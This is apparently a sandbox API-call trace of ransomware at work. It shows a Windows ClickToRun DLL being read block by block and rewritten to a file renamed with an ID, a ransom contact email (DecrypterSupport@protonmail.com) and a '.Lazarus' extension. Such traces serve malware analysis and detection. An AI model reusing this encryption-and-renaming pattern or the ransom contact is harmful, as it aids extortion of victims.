RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c650 [0091.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0091.211] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1b7300, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x60ea0)) returned 1 [0091.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0091.212] AreFileApisANSI () returned 1 [0091.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0091.212] GetLastError () returned 0x0 [0091.212] SetLastError (dwErrCode=0x0) [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0091.212] GetLastError () returned 0x0 [0091.212] SetLastError (dwErrCode=0x0) [0091.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a368 [0091.212] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0091.212] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0091.213] AreFileApisANSI () returned 1 [0091.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a368, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 140 [0091.213] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x118) returned 0x92010 [0091.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a368, cbMultiByte=-1, lpWideCharStr=0x92010, cchWideChar=140 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 140 [0091.213] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.213] GetFileType (hFile=0x33c) returned 0x1 [0091.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92010 | out: hHeap=0x20000) returned 1 [0091.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0091.214] AreFileApisANSI () returned 1 [0091.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c458 [0091.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0091.214] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.214] GetFileType (hFile=0x418) returned 0x1 [0091.214] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0091.214] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0091.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0091.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0091.215] GetLastError () returned 0x0 [0091.215] SetLastError (dwErrCode=0x0) [0091.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0091.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0091.215] GetLastError () returned 0x0 [0091.215] SetLastError (dwErrCode=0x0) [0091.215] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0091.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0091.215] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0091.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0091.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0091.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0091.218] GetLastError () returned 0x0 [0091.218] SetLastError (dwErrCode=0x0) [0091.218] GetLastError () returned 0x0 [0091.218] SetLastError (dwErrCode=0x0) [0091.218] GetLastError () returned 0x0 [0091.218] SetLastError (dwErrCode=0x0) [0091.219] GetLastError () returned 0x0 [0091.219] SetLastError (dwErrCode=0x0) [0091.219] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.280] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.281] GetLastError () returned 0x0 [0091.281] SetLastError (dwErrCode=0x0) [0091.281] GetLastError () returned 0x0 [0091.281] SetLastError (dwErrCode=0x0) [0091.281] GetLastError () returned 0x0 [0091.281] SetLastError (dwErrCode=0x0) [0091.281] GetLastError () returned 0x0 [0091.281] SetLastError (dwErrCode=0x0) [0091.281] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.281] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.282] GetLastError () returned 0x0 [0091.282] SetLastError (dwErrCode=0x0) [0091.282] GetLastError () returned 0x0 [0091.282] SetLastError (dwErrCode=0x0) [0091.282] GetLastError () returned 0x0 [0091.282] SetLastError (dwErrCode=0x0) [0091.282] GetLastError () returned 0x0 [0091.282] SetLastError (dwErrCode=0x0) [0091.282] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.282] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.282] GetLastError () returned 0x0 [0091.283] SetLastError (dwErrCode=0x0) [0091.283] GetLastError () returned 0x0 [0091.283] SetLastError (dwErrCode=0x0) [0091.283] GetLastError () returned 0x0 [0091.283] SetLastError (dwErrCode=0x0) [0091.283] GetLastError () returned 0x0 [0091.283] SetLastError (dwErrCode=0x0) [0091.283] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.283] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.283] GetLastError () returned 0x0 [0091.283] SetLastError (dwErrCode=0x0) [0091.283] GetLastError () returned 0x0 [0091.284] SetLastError (dwErrCode=0x0) [0091.284] GetLastError () returned 0x0 [0091.284] SetLastError (dwErrCode=0x0) [0091.284] GetLastError () returned 0x0 [0091.284] SetLastError (dwErrCode=0x0) [0091.284] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.284] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.285] GetLastError () returned 0x0 [0091.285] SetLastError (dwErrCode=0x0) [0091.285] GetLastError () returned 0x0 [0091.285] SetLastError (dwErrCode=0x0) [0091.285] GetLastError () returned 0x0 [0091.285] SetLastError (dwErrCode=0x0) [0091.285] GetLastError () returned 0x0 [0091.285] SetLastError (dwErrCode=0x0) [0091.285] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.285] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.286] GetLastError () returned 0x0 [0091.286] SetLastError (dwErrCode=0x0) [0091.286] GetLastError () returned 0x0 [0091.286] SetLastError (dwErrCode=0x0) [0091.286] GetLastError () returned 0x0 [0091.286] SetLastError (dwErrCode=0x0) [0091.286] GetLastError () returned 0x0 [0091.286] SetLastError (dwErrCode=0x0) [0091.286] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.286] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.287] GetLastError () returned 0x0 [0091.287] SetLastError (dwErrCode=0x0) [0091.287] GetLastError () returned 0x0 [0091.287] SetLastError (dwErrCode=0x0) [0091.287] GetLastError () returned 0x0 [0091.287] SetLastError (dwErrCode=0x0) [0091.287] GetLastError () returned 0x0 [0091.287] SetLastError (dwErrCode=0x0) [0091.287] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.287] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.287] GetLastError () returned 0x0 [0091.287] SetLastError (dwErrCode=0x0) [0091.288] GetLastError () returned 0x0 [0091.288] SetLastError (dwErrCode=0x0) [0091.288] GetLastError () returned 0x0 [0091.288] SetLastError (dwErrCode=0x0) [0091.288] GetLastError () returned 0x0 [0091.288] SetLastError (dwErrCode=0x0) [0091.288] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.288] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.288] GetLastError () returned 0x0 [0091.288] SetLastError (dwErrCode=0x0) [0091.288] GetLastError () returned 0x0 [0091.288] SetLastError (dwErrCode=0x0) [0091.289] GetLastError () returned 0x0 [0091.289] SetLastError (dwErrCode=0x0) [0091.289] GetLastError () returned 0x0 [0091.289] SetLastError (dwErrCode=0x0) [0091.289] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.289] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.289] GetLastError () returned 0x0 [0091.289] SetLastError (dwErrCode=0x0) [0091.289] GetLastError () returned 0x0 [0091.289] SetLastError (dwErrCode=0x0) [0091.290] GetLastError () returned 0x0 [0091.290] SetLastError (dwErrCode=0x0) [0091.290] GetLastError () returned 0x0 [0091.290] SetLastError (dwErrCode=0x0) [0091.290] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.290] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.290] GetLastError () returned 0x0 [0091.290] SetLastError (dwErrCode=0x0) [0091.290] GetLastError () returned 0x0 [0091.290] SetLastError (dwErrCode=0x0) [0091.290] GetLastError () returned 0x0 [0091.290] SetLastError (dwErrCode=0x0) [0091.290] GetLastError () returned 0x0 [0091.291] SetLastError (dwErrCode=0x0) [0091.291] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.291] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.291] GetLastError () returned 0x0 [0091.291] SetLastError (dwErrCode=0x0) [0091.291] GetLastError () returned 0x0 [0091.291] SetLastError (dwErrCode=0x0) [0091.291] GetLastError () returned 0x0 [0091.291] SetLastError (dwErrCode=0x0) [0091.291] GetLastError () returned 0x0 [0091.291] SetLastError (dwErrCode=0x0) [0091.292] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.292] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.292] GetLastError () returned 0x0 [0091.292] SetLastError (dwErrCode=0x0) [0091.292] GetLastError () returned 0x0 [0091.292] SetLastError (dwErrCode=0x0) [0091.292] GetLastError () returned 0x0 [0091.292] SetLastError (dwErrCode=0x0) [0091.292] GetLastError () returned 0x0 [0091.292] SetLastError (dwErrCode=0x0) [0091.292] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.294] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.294] GetLastError () returned 0x0 [0091.294] SetLastError (dwErrCode=0x0) [0091.294] GetLastError () returned 0x0 [0091.294] SetLastError (dwErrCode=0x0) [0091.295] GetLastError () returned 0x0 [0091.295] SetLastError (dwErrCode=0x0) [0091.295] GetLastError () returned 0x0 [0091.295] SetLastError (dwErrCode=0x0) [0091.295] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.295] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.295] GetLastError () returned 0x0 [0091.295] SetLastError (dwErrCode=0x0) [0091.295] GetLastError () returned 0x0 [0091.295] SetLastError (dwErrCode=0x0) [0091.295] GetLastError () returned 0x0 [0091.295] SetLastError (dwErrCode=0x0) [0091.296] GetLastError () returned 0x0 [0091.296] SetLastError (dwErrCode=0x0) [0091.296] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.296] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.296] GetLastError () returned 0x0 [0091.296] SetLastError (dwErrCode=0x0) [0091.296] GetLastError () returned 0x0 [0091.296] SetLastError (dwErrCode=0x0) [0091.296] GetLastError () returned 0x0 [0091.296] SetLastError (dwErrCode=0x0) [0091.296] GetLastError () returned 0x0 [0091.296] SetLastError (dwErrCode=0x0) [0091.297] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.297] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.297] GetLastError () returned 0x0 [0091.297] SetLastError (dwErrCode=0x0) [0091.297] GetLastError () returned 0x0 [0091.297] SetLastError (dwErrCode=0x0) [0091.297] GetLastError () returned 0x0 [0091.297] SetLastError (dwErrCode=0x0) [0091.297] GetLastError () returned 0x0 [0091.297] SetLastError (dwErrCode=0x0) [0091.297] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.298] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.298] GetLastError () returned 0x0 [0091.298] SetLastError (dwErrCode=0x0) [0091.298] GetLastError () returned 0x0 [0091.298] SetLastError (dwErrCode=0x0) [0091.298] GetLastError () returned 0x0 [0091.298] SetLastError (dwErrCode=0x0) [0091.298] GetLastError () returned 0x0 [0091.298] SetLastError (dwErrCode=0x0) [0091.298] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.298] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.299] GetLastError () returned 0x0 [0091.299] SetLastError (dwErrCode=0x0) [0091.299] GetLastError () returned 0x0 [0091.299] SetLastError (dwErrCode=0x0) [0091.299] GetLastError () returned 0x0 [0091.299] SetLastError (dwErrCode=0x0) [0091.299] GetLastError () returned 0x0 [0091.299] SetLastError (dwErrCode=0x0) [0091.299] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.299] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.299] GetLastError () returned 0x0 [0091.300] SetLastError (dwErrCode=0x0) [0091.300] GetLastError () returned 0x0 [0091.300] SetLastError (dwErrCode=0x0) [0091.300] GetLastError () returned 0x0 [0091.300] SetLastError (dwErrCode=0x0) [0091.300] GetLastError () returned 0x0 [0091.300] SetLastError (dwErrCode=0x0) [0091.300] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.301] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.301] GetLastError () returned 0x0 [0091.301] SetLastError (dwErrCode=0x0) [0091.301] GetLastError () returned 0x0 [0091.301] SetLastError (dwErrCode=0x0) [0091.301] GetLastError () returned 0x0 [0091.301] SetLastError (dwErrCode=0x0) [0091.301] GetLastError () returned 0x0 [0091.301] SetLastError (dwErrCode=0x0) [0091.301] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.301] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.302] GetLastError () returned 0x0 [0091.302] SetLastError (dwErrCode=0x0) [0091.302] GetLastError () returned 0x0 [0091.302] SetLastError (dwErrCode=0x0) [0091.302] GetLastError () returned 0x0 [0091.302] SetLastError (dwErrCode=0x0) [0091.302] GetLastError () returned 0x0 [0091.302] SetLastError (dwErrCode=0x0) [0091.302] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.302] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.302] GetLastError () returned 0x0 [0091.303] SetLastError (dwErrCode=0x0) [0091.303] GetLastError () returned 0x0 [0091.303] 